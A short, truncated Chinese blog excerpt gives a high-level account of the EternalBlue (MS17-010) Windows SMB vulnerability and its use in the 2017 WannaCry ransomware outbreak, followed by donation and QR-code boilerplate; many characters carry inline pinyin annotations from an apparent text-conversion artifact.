    永恒之藍(lán)(ms17-010)爆發(fā)于2017年4月14日晚,是一種利用Windows系統(tǒng)的SMB協(xié)議漏洞來獲取系統(tǒng)的最高權(quán)限,以此來控制被入侵的計(jì)算機(jī)。甚至于2017年5月12日, 不法分子通過改造“永恒之藍(lán)”制作了wannacry勒索病毒,使全世界大范圍內(nèi)遭受了該勒索病毒,甚至波及到學(xué)校、大型企

    2024年02月08日
    瀏覽(25)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包